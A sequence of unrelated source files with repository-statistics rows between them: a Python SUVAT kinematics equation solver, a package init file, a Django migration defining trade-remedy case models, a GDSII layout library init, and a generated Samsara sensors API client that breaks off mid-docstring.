if (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
self.V = self.U + (self.A * self.T)
return self.V
elif (self.U is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
self.U = self.V - (self.A * self.T)
return self.U
elif (self.A is None) and (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) :
self.A = (self.V - self.U) / self.T
return self.A
elif (self.T is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.U) is int or type(self.U) is float) :
self.T = (self.V - self.U) / self.A
return self.T
else :
pass
def v_squared_equals_u_squared_plus_2as(self) :
if (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
            V_squared = (self.U ** 2) + (2 * self.A * self.S)  # v^2 = u^2 + 2as
self.V = sqrt(abs(V_squared))
return self.V
elif (self.U is None) and (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
U_squared = (self.V ** 2) - (2 * self.A * self.S)
self.U = sqrt(abs(U_squared))
return self.U
elif (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.V) is int or type(self.V) is float) :
self.S = ((self.V ** 2) - (self.U ** 2)) / (2 * self.A)
return self.S
elif (self.A is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) :
self.A = ((self.V ** 2) - (self.U ** 2)) / (2 * self.S)
return self.A
else:
pass
def s_equals_ut_plus_half_at_squared(self) :
if (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.S = (self.U * self.T) + (0.5 * self.A * (self.T ** 2))
return self.S
elif (self.U is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
            self.U = ((2 * self.S) - (self.A * (self.T ** 2))) / (2 * self.T)  # u = (2s - at^2) / (2t)
return self.U
elif (self.A is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.U) is int or type(self.U) is float) :
self.A = (2 * (self.S - (self.U * self.T))) / (self.T ** 2)
return self.A
elif (self.T is None) and (type(self.S) is int or type(self.S) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) :
            self.T = (sqrt(abs((self.U ** 2) + (2 * self.A * self.S))) - self.U) / self.A  # t = (-u + sqrt(u^2 + 2as)) / a
return self.T
else:
pass
def s_equals_vt_minus_half_at_squared(self) :
if (self.S is None) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
self.S = (self.V * self.T) - (0.5 * self.A * (self.T ** 2))
return self.S
elif (self.V is None) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.A) is int or type(self.A) is float) :
            self.V = ((2 * self.S) + (self.A * (self.T ** 2))) / (2 * self.T)  # v = (2s + at^2) / (2t)
return self.V
elif (self.A is None) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) and (type(self.S) is int or type(self.S) is float) :
self.A = (2 * ((self.V * self.T) - self.S)) / (self.T ** 2)
return self.A
elif (self.T is None) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.A) is int or type(self.A) is float) :
            self.T = (self.V - sqrt(abs((self.V ** 2) - (2 * self.A * self.S)))) / self.A  # t = (v - sqrt(v^2 - 2as)) / a
return self.T
else:
pass
def s_equals_half_u_plus_v_t(self) :
if (self.S is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
self.S = (self.T / 2) * (self.U + self.V)
return self.S
elif (self.U is None) and (type(self.S) is int or type(self.S) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
            self.U = ((2 * self.S) / self.T) - self.V  # u = 2s/t - v
return self.U
elif (self.V is None) and (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.T) is int or type(self.T) is float) :
self.V = ((2 * self.S) / self.T) - self.U
return self.V
elif (self.T is None) and (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.S) is int or type(self.S) is float) :
self.T = (2 * self.S) / (self.U + self.V)
return self.T
else:
pass
def Find(self) :
while type(self.S) is not float:
print("check 1")
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_half_u_plus_v_t()
self.s_equals_vt_minus_half_at_squared()
print("check 2")
while type(self.U) is not float:
self.s_equals_ut_plus_half_at_squared()
self.v_equals_u_plus_at()
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_half_u_plus_v_t()
while type(self.V) is not float:
self.v_equals_u_plus_at()
self.s_equals_half_u_plus_v_t()
self.s_equals_vt_minus_half_at_squared()
self.v_squared_equals_u_squared_plus_2as()
while type(self.A) is not float:
self.v_equals_u_plus_at()
self.v_squared_equals_u_squared_plus_2as()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_vt_minus_half_at_squared()
while type(self.T) is not float:
self.v_equals_u_plus_at()
self.s_equals_ut_plus_half_at_squared()
self.s_equals_vt_minus_half_at_squared()
self.s_equals_half_u_plus_v_t()
return None
# if (find.lower() == 'v') and (self.V is None) :
# if (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) and (type(self.A) is int or type(self.A) is float) :
# return round(self.v_squared_equals_u_squared_plus_2as(),1)
# elif (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 's') and (self.S is None) :
# if (type(self.U) is int or type(self.U) is float) and (type(self.V) is int or type(self.V) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_half_u_plus_v_t(),1)
# elif (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_ut_plus_half_at_squared(),2)
# elif (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.s_equals_vt_minus_half_at_squared(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 't') and (self.T is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.A) is int or type(self.A) is float) :
# return round(self.v_equals_u_plus_at(),2)
# else :
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 'u') and (self.U is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
# elif (type(self.V) is int or type(self.V) is float) and (type(self.A) is int or type(self.A) is float) and (type(self.S) is int or type(self.S) is float) :
# if type(self.v_squared_equals_u_squared_plus_2as()) is complex:
# raise TypeError("Result is a complex number")
# else:
# return round(self.v_squared_equals_u_squared_plus_2as(),2)
# else:
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# elif (find.lower() == 'a') and (self.A is None) :
# if (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.T) is int or type(self.T) is float) :
# return round(self.v_equals_u_plus_at(),2)
# elif (type(self.V) is int or type(self.V) is float) and (type(self.U) is int or type(self.U) is float) and (type(self.S) is int or type(self.S) is float) :
# return round(self.v_squared_equals_u_squared_plus_2as(),2)
# else:
# return "ERROR: EITHER SUPPORT IS YET TO BE ADDED OR WRONG VARIABLES ADDED"
#
# else:
# return "ERROR: YOU DID NOT SELECT A VALID VARIABLE TO FIND"
def print_values(self) :
values = f'''
S is {self.S}
U is {self.U}
V is {self.V}
A is {self.A}
T is {self.T}
'''
print(values)
| 54.185714 | 184 | 0.572634 | 2,066 | 11,379 | 3.053727 | 0.035334 | 0.235854 | 0.099857 | 0.156919 | 0.90363 | 0.889998 | 0.864796 | 0.853226 | 0.804089 | 0.7987 | 0 | 0.007929 | 0.290623 | 11,379 | 209 | 185 | 54.444976 | 0.773662 | 0.291678 | 0 | 0.406504 | 0 | 0 | 0.011612 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065041 | false | 0.04065 | 0.00813 | 0 | 0.252033 | 0.03252 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
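With the sign fixes applied above, the class can be checked against a known case: free fall from rest with a = 9.8 m/s^2 for t = 3 s gives v = 29.4 m/s and s = 44.1 m. A short, hedged usage sketch:

# Worked check of the corrected equations (free fall from rest).
kin = SUVAT(U=0.0, A=9.8, T=3.0)
print(kin.v_equals_u_plus_at())                # ~29.4  (v = u + at)
print(kin.s_equals_ut_plus_half_at_squared())  # ~44.1  (s = ut + at^2/2)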
5aafec0f17384703abe5ee99cb2b4b7726678cb2 | 84 | py | Python | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | 1 | 2021-11-30T16:52:50.000Z | 2021-11-30T16:52:50.000Z | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | null | null | null | src/pylexibank/commands/__init__.py | LinguList/pylexibank | 8ab24d90452032d5b3b757e23ffb344d19fb39d9 | [
"Apache-2.0"
] | null | null | null | from . import misc # noqa
from . import curate # noqa
from . import check # noqa
| 21 | 28 | 0.678571 | 12 | 84 | 4.75 | 0.5 | 0.526316 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 84 | 3 | 29 | 28 | 0.904762 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5ac4b368a6d58d6c48e66428bf7837810e8a6d9f | 16,103 | py | Python | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | 1 | 2020-08-13T10:37:15.000Z | 2020-08-13T10:37:15.000Z | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | 4 | 2020-09-10T13:41:52.000Z | 2020-12-16T09:00:21.000Z | trade_remedies_api/cases/migrations/0001_initial.py | uktrade/trade-remedies-api | fbe2d142ef099c7244788a0f72dd1003eaa7edce | [
"MIT"
] | null | null | null | # Generated by Django 2.0.1 on 2018-10-15 14:44
import audit.models
import dirtyfields.dirtyfields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django_countries.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="ArchiveReason",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=250)),
("key", models.CharField(blank=True, max_length=250, null=True)),
],
),
migrations.CreateModel(
name="Case",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("sequence", models.IntegerField(blank=True, null=True, unique=True)),
("name", models.CharField(blank=True, max_length=250, null=True)),
("initiated_at", models.DateTimeField(blank=True, null=True)),
("submitted_at", models.DateTimeField(blank=True, null=True)),
("archived_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseDocument",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseDocumentType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name="CaseStage",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("key", models.CharField(max_length=100, unique=True)),
("name", models.CharField(max_length=100)),
("public_name", models.CharField(blank=True, max_length=150, null=True)),
("order", models.SmallIntegerField(default=0)),
("locking", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="CaseTimeGate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("ack", models.BooleanField(default=False)),
("ack_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
("acronym", models.CharField(blank=True, max_length=4, null=True)),
("colour", models.CharField(blank=True, max_length=16, null=True)),
],
),
migrations.CreateModel(
name="CaseWorkflow",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("workflow", django.contrib.postgres.fields.jsonb.JSONField(default=dict)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="CaseWorkflowState",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("key", models.CharField(max_length=250)),
("value", django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
("due_date", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="DocumentTemplate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("downloaded", models.BooleanField(default=False)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="ExportSource",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("country", django_countries.fields.CountryField(max_length=2)),
],
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="HSCode",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("code", models.CharField(max_length=50, unique=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="Product",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(blank=True, max_length=250, null=True)),
("description", models.TextField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="Sector",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=250)),
("code", models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name="Submission",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(blank=True, max_length=500, null=True)),
("review", models.NullBooleanField()),
("doc_reviewed_at", models.DateTimeField(blank=True, null=True)),
("version", models.SmallIntegerField(default=1)),
("sent_at", models.DateTimeField(blank=True, null=True)),
("received_at", models.DateTimeField(blank=True, null=True)),
("due_at", models.DateTimeField(blank=True, null=True)),
("deficiency_notice", models.TextField(blank=True, null=True)),
("deficiency_sent_at", models.DateTimeField(blank=True, null=True)),
("archived", models.BooleanField(default=False)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="SubmissionDocument",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("downloads", models.SmallIntegerField(default=0)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("issued", models.BooleanField(default=False)),
("issued_at", models.DateTimeField(blank=True, null=True)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
migrations.CreateModel(
name="SubmissionStatus",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=100)),
("order", models.SmallIntegerField(default=0)),
("locking", models.BooleanField(default=False)),
("version", models.BooleanField(default=False)),
("duration", models.SmallIntegerField(blank=True, null=True)),
("default", models.BooleanField(default=False)),
("sent", models.BooleanField(default=False)),
("received", models.BooleanField(default=False)),
("sufficient", models.BooleanField(default=False)),
("review", models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name="SubmissionType",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("name", models.CharField(max_length=150)),
("key", models.CharField(blank=True, max_length=50, null=True)),
(
"direction",
models.IntegerField(
choices=[
(-1, "None"),
(0, "Both"),
(1, "Public -> TRA"),
(2, "Public <- TRA"),
],
default=0,
),
),
],
),
migrations.CreateModel(
name="TimeGate",
fields=[
(
"id",
models.UUIDField(
default=uuid.uuid4, editable=False, primary_key=True, serialize=False
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("last_modified", models.DateTimeField(auto_now=True, null=True)),
("deleted_at", models.DateTimeField(blank=True, null=True)),
("name", models.CharField(max_length=250)),
("spec", django.contrib.postgres.fields.jsonb.JSONField(default=dict)),
],
options={"abstract": False,},
bases=(
models.Model,
dirtyfields.dirtyfields.DirtyFieldsMixin,
audit.mixins.AuditableMixin,
),
),
]
| 40.2575 | 97 | 0.475874 | 1,223 | 16,103 | 6.152903 | 0.111202 | 0.047841 | 0.059003 | 0.056478 | 0.8299 | 0.802658 | 0.767575 | 0.726645 | 0.702326 | 0.696478 | 0 | 0.009627 | 0.40657 | 16,103 | 399 | 98 | 40.358396 | 0.777836 | 0.002795 | 0 | 0.744898 | 1 | 0 | 0.071562 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.015306 | 0 | 0.02551 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
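The migration above only declares the schema; it takes effect when applied. A hedged sketch using Django's management API (the app label `cases` is inferred from the file path and may differ in the real project):

# Apply the initial migration programmatically; equivalent to running
# `python manage.py migrate cases 0001_initial` from the shell.
import django
from django.core.management import call_command

django.setup()  # assumes DJANGO_SETTINGS_MODULE is already configured
call_command("migrate", "cases", "0001_initial")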
518e849b7f40346a056c8e9554110a254e6733f8 | 310 | py | Python | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 10 | 2018-07-13T09:46:21.000Z | 2021-06-22T13:34:50.000Z | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 8 | 2018-09-09T11:32:40.000Z | 2019-10-08T07:47:31.000Z | spira/yevon/gdsii/__init__.py | qedalab/spira | 32e4d2096e298b9fcc5952abd654312dc232a259 | [
"MIT"
] | 7 | 2019-01-17T18:50:17.000Z | 2022-01-13T20:27:52.000Z | from spira.yevon.gdsii.cell import *
from spira.yevon.gdsii.cell_list import *
from spira.yevon.gdsii.group import *
from spira.yevon.gdsii.label import *
from spira.yevon.gdsii.library import *
from spira.yevon.gdsii.polygon import *
from spira.yevon.gdsii.sref import *
from spira.yevon.gdsii.pcell import *
| 34.444444 | 41 | 0.793548 | 49 | 310 | 5 | 0.265306 | 0.293878 | 0.457143 | 0.620408 | 0.82449 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 310 | 8 | 42 | 38.75 | 0.881295 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
cf93f4acfdc1b448c63c24dc5bad0105df15196c | 23,525 | py | Python | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | 1 | 2019-09-17T14:11:52.000Z | 2019-09-17T14:11:52.000Z | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | null | null | null | samsara/apis/sensors_api.py | eirerocks/samsara-python-eu | e0f1bd8f42d083fc713f910b74123d3bc7408538 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Samsara API
# Introduction The Samsara REST API lets you interact with the Samsara Cloud from anything that can send an HTTP request. With the Samsara API you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. If you’re familiar with what you can build with a REST API, the following API reference guide will be your go-to resource. API access to the Samsara cloud is available to all Samsara administrators. If you’d like to try the API, [contact us](https://www.samsara.com/free-trial). The API is currently in beta and may be subject to frequent changes. # Connecting to the API There are two ways to connect to the API. If you prefer to use the API in Javascript or Python, we supply SDKs which you can download here: [Javascript SDK](https://github.com/samsarahq/samsara-js), [Python SDK](https://github.com/samsarahq/samsara-python). If you’d rather use another language to interact with the Samsara API, the endpoints and examples are in the reference guide below.
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class SensorsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_sensors(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_sensors_with_http_info(access_token, group_param, **kwargs)
return data
def get_sensors_with_http_info(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_sensors`")
collection_formats = {}
resource_path = '/sensors/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_history(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
else:
(data) = self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
return data
def get_sensors_history_with_http_info(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
